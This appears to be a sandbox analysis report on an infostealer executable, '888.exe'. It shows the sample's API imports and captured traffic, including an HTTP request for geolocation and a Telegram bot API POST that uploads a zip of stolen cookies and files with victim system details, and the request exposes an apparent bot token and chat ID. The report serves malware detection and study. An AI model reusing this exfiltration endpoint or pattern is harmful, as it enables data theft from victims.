GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, GetExitCodeProcess, CreateFileW, WaitForSingleObject, InitializeSListHead, TlsGetValue, TlsSetValue, GetProcessHeap, CreateThread, HeapAlloc, HeapReAlloc, CloseHandle, HeapFree, IsDebuggerPresent, EncodePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, LoadLibraryA, WriteFileEx
                                                                          user32.dllEnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
                                                                          ws2_32.dllselect, setsockopt, getaddrinfo, WSASocketW, freeaddrinfo, getsockopt, WSASend, accept, closesocket, ioctlsocket, WSAStartup, socket, getsockname, WSAGetLastError, getpeername, connect, WSACleanup, recv, shutdown, send, WSAIoctl, bind, listen
                                                                          bcrypt.dllBCryptGenRandom
                                                                          advapi32.dllRegCloseKey, AllocateAndInitializeSid, RegOpenKeyExW, SystemFunction036, FreeSid, CheckTokenMembership, RegQueryValueExW
                                                                          crypt32.dllCryptUnprotectData, CertEnumCertificatesInStore, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertDuplicateCertificateChain, CertGetCertificateChain, CertFreeCertificateContext, CertCloseStore, CertDuplicateCertificateContext, CertOpenStore, CertDuplicateStore, CertAddCertificateContextToStore
                                                                          secur32.dllApplyControlToken, AcquireCredentialsHandleA, QueryContextAttributesW, FreeCredentialsHandle, AcceptSecurityContext, DeleteSecurityContext, FreeContextBuffer, InitializeSecurityContextW, EncryptMessage, DecryptMessage
                                                                          oleaut32.dllSysFreeString, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, VariantClear
                                                                          rstrtmgr.dllRmStartSession, RmGetList, RmRegisterResources
                                                                          ole32.dllCoInitializeEx, CoSetProxyBlanket, CoCreateInstance, CoInitializeSecurity
                                                                          gdi32.dllSetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, CreateCompatibleDC, DeleteDC, GetDeviceCaps, CreateDCW, SelectObject, CreateCompatibleBitmap
                                                                          api-ms-win-crt-string-l1-1-0.dllstrcpy_s, strlen, strcmp, strcspn, strncmp, wcsncmp
                                                                          api-ms-win-crt-math-l1-1-0.dll_dclass, log, ceil, pow, exp2f, __setusermatherr, roundf, truncf
                                                                          api-ms-win-crt-heap-l1-1-0.dllmalloc, realloc, _msize, _set_new_mode, free, calloc
                                                                          api-ms-win-crt-utility-l1-1-0.dllqsort, _rotl64
                                                                          api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                                                          api-ms-win-crt-runtime-l1-1-0.dll_initterm, _crt_atexit, _initterm_e, exit, _configure_narrow_argv, _controlfp_s, _set_app_type, abort, __p___argc, _seh_filter_exe, _endthreadex, __p___argv, _cexit, _beginthreadex, _register_onexit_function, _c_exit, _register_thread_local_exe_atexit_callback, terminate, _get_initial_narrow_environment, _initialize_onexit_table, _exit, _initialize_narrow_environment
                                                                          api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                                                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 13, 2024 12:45:40.493951082 CET4970480192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:45:40.614201069 CET8049704108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:45:40.614353895 CET4970480192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:45:40.615731001 CET4970480192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:45:40.735630989 CET8049704108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:45:42.282897949 CET8049704108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:45:42.288141012 CET4970480192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:45:42.409996986 CET8049704108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:45:42.410150051 CET4970480192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:17.292639017 CET4976180192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:17.412736893 CET8049761108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:46:17.412892103 CET4976180192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:17.413247108 CET4976180192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:17.533018112 CET8049761108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:46:19.076994896 CET8049761108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:46:19.077486038 CET4976180192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:19.198033094 CET8049761108.181.61.49192.168.2.5
                                                                          Dec 13, 2024 12:46:19.198122025 CET4976180192.168.2.5108.181.61.49
                                                                          Dec 13, 2024 12:46:38.411426067 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:38.411489010 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:38.411561012 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:38.439357996 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:38.439378977 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.199309111 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.199461937 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.201653957 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.201667070 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.202011108 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.258244038 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.320436954 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.320573092 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.320683002 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.320734978 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.320821047 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.320843935 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321027994 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321103096 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321120977 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321346045 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321379900 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321407080 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321460962 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321513891 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321544886 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321614027 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321640015 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321662903 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321790934 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321824074 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321841955 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321852922 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321932077 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321952105 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321968079 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.321974993 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.321990967 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322010994 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322050095 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322062969 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322065115 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322073936 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322081089 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322087049 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322151899 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322163105 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322179079 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322192907 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322206974 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322236061 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322236061 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322256088 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322262049 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322274923 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322315931 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.322318077 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.322408915 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336246967 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336253881 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336479902 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336493969 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336566925 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336581945 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336601019 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336612940 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336623907 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336636066 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336704016 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336714029 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336735010 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336747885 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336760044 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336771965 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.336812973 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336858034 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336865902 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336888075 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.336935997 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.337024927 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.337044954 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.337063074 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.337142944 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.338593960 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383337975 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.383651018 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383713961 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383737087 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383760929 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383783102 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383790970 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383800030 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383841991 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.383865118 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.398765087 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427335024 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.427515030 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427598953 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427625895 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427639961 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427654982 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.427679062 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.438369036 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:40.441927910 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.682069063 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:40.683106899 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:43.659843922 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:43.662298918 CET44349813149.154.167.220192.168.2.5
                                                                          Dec 13, 2024 12:46:43.662390947 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:43.664236069 CET49813443192.168.2.5149.154.167.220
                                                                          Dec 13, 2024 12:46:43.664251089 CET44349813149.154.167.220192.168.2.5

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 13, 2024 12:45:40.349163055 CET5865353192.168.2.51.1.1.1
                                                                          Dec 13, 2024 12:45:40.489345074 CET53586531.1.1.1192.168.2.5
                                                                          Dec 13, 2024 12:46:38.273216009 CET4951453192.168.2.51.1.1.1
                                                                          Dec 13, 2024 12:46:38.410420895 CET53495141.1.1.1192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 13, 2024 12:45:40.349163055 CET192.168.2.51.1.1.10xc690Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                          Dec 13, 2024 12:46:38.273216009 CET192.168.2.51.1.1.10x70ecStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 13, 2024 12:45:40.489345074 CET1.1.1.1192.168.2.50xc690No error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                                                                          Dec 13, 2024 12:46:38.410420895 CET1.1.1.1192.168.2.50x70ecNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • api.telegram.org
                                                                          • ipwho.is

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549704108.181.61.49805752C:\Users\user\Desktop\888.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 13, 2024 12:45:40.615731001 CET59OUTGET /?output=json HTTP/1.1
                                                                          accept: */*
                                                                          host: ipwho.is
                                                                          Dec 13, 2024 12:45:42.282897949 CET943INHTTP/1.1 200 OK
                                                                          Date: Fri, 13 Dec 2024 11:45:41 GMT
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Server: ipwhois
                                                                          Access-Control-Allow-Headers: *
                                                                          X-Robots-Tag: noindex
                                                                          Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
                                                                          Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:45:41-05:00"}}0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549761108.181.61.49805752C:\Users\user\Desktop\888.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 13, 2024 12:46:17.413247108 CET59OUTGET /?output=json HTTP/1.1
                                                                          accept: */*
                                                                          host: ipwho.is
                                                                          Dec 13, 2024 12:46:19.076994896 CET943INHTTP/1.1 200 OK
                                                                          Date: Fri, 13 Dec 2024 11:46:18 GMT
                                                                          Content-Type: application/json; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Server: ipwhois
                                                                          Access-Control-Allow-Headers: *
                                                                          X-Robots-Tag: noindex
                                                                          Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
                                                                          Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:46:18-05:00"}}0


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549813149.154.167.2204435752C:\Users\user\Desktop\888.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-13 11:46:40 UTC1277OUTPOST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags% [TRUNCATED]
                                                                          content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378
                                                                          content-length: 888104
                                                                          accept: */*
                                                                          host: api.telegram.org
                                                                          2024-12-13 11:46:40 UTC15107OUTData Raw: 2d 2d 65 38 62 65 35 37 32 61 34 66 31 63 61 34 35 39 2d 31 37 62 65 31 63 36 62 64 31 65 37 63 61 35 65 2d 39 64 36 61 61 31 62 63 66 33 33 63 66 63 31 36 2d 30 37 62 36 64 65 62 34 37 36 66 30 63 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 31 38 39 5f 41 4c 46 4f 4e 53 2d 50 43 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 f3 65 8d 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 f3 65 8d 59 00 00 00 00 00
                                                                          Data Ascii: --e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.189_user-PC.zip"Content-Type: application/zipPKeYAutofill/PKeY
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: b0 4d 6b 0d 80 52 0a 92 b0 4d 6b 8d 52 0a e3 38 22 89 c5 62 81 6d c6 71 24 22 90 84 6d 32 13 db 44 04 11 41 66 32 4d 13 35 02 49 00 48 02 c0 36 00 b6 b1 4d 44 50 6b 65 1c 47 00 ba ae 63 9a 26 32 93 50 45 12 11 01 40 6b 8d d6 1a 00 a5 14 6a ad 4c d3 84 6d 24 61 9b d6 1a 00 a5 14 24 71 3f 49 00 64 26 00 92 a8 b5 92 99 64 26 99 c9 fd 24 01 60 9b 88 40 12 b6 b1 0d 80 24 24 61 9b cc 24 24 22 82 cc 64 1c 47 24 d1 75 1d 99 89 24 5a 6b 44 04 b6 69 ad 51 6b 45 12 b6 69 ad 91 99 94 52 28 a5 00 60 1b 00 19 32 13 db 00 44 04 92 c8 4c 32 93 5a 2b f7 b3 4d 66 02 10 11 48 62 9a 26 22 82 88 40 12 00 b6 01 90 84 6d 5a 6b d8 26 22 88 08 1e 68 18 06 ba ae 63 9a 26 9c 49 ed 3a 32 93 cc 64 36 9b 31 8e 23 f7 93 84 24 00 6c 93 99 cc 6a 47 66 62 1b db 44 04 f7 b3 8d 6d 24 21 89
                                                                          Data Ascii: MkRMkR8"bmq$"m2DAf2M5IH6MDPkeGc&2PE@kjLm$a$q?Id&d&$`@$$a$$"dG$u$ZkDiQkEiR(`2DL2Z+MfHb&"@mZk&"hc&I:2d61#$ljGfbDm$!
                                                                          2024-12-13 11:46:40 UTC16384OUTData Raw: e0 2f cf 9b fb 7d c3 6b 6f b2 e8 0b 10 00 4c e3 c0 a5 dd 0b 1c 1d ec f3 af f5 db c3 f5 fc d6 ea 1a 9e 1f 49 3c 90 6d 9e 2f 9b cb 24 fe 33 7d e5 8b fd 3d 1f 7d f3 df a3 e8 c1 09 36 90 e0 04 0c 4e 6e 5d 9f e0 65 bf f3 5b 30 f0 e2 d7 3d 8c 4f 7f b3 0f e1 b1 27 6e e6 ba 8d e3 dc ef ec 1d 7f c3 c9 eb 5f 9c fb 5d fc 9c 4f 61 f3 63 3f 85 58 6c 10 11 00 d4 37 7d 4d f2 97 7f 1f 80 3f b8 7d 9f 37 f8 bd 39 ff 13 1d 7b fa 5b f1 c2 1c 9b 6f f1 b7 1f f7 43 ec cc 37 b9 df 6b 7e e3 07 f2 77 77 3f 85 17 e6 be cf fc 15 00 ae f9 dc 37 e2 b9 dd f7 99 bf c2 a3 7e e4 c3 79 6e 4f 7c a7 af e7 7e 9f f5 19 9f ca 17 3f fc 33 78 20 db fc 7b 04 2f 9c 6d fe 33 c9 bc 50 92 b0 cd 03 d9 e6 bf 8a 6d 5e 18 99 ff 54 b6 79 61 c2 bc c8 24 61 1b 00 db d8 46 12 ff 1e 72 f0 c2 d8 e6 3f 93 6d 5e
                                                                          Data Ascii: /}koLI<m/$3}=}6Nn]e[0=O'n_]Oac?Xl7}M?}79{[oC7k~ww?7~ynO|~?3x {/m3Pm^Tya$aFr?m^
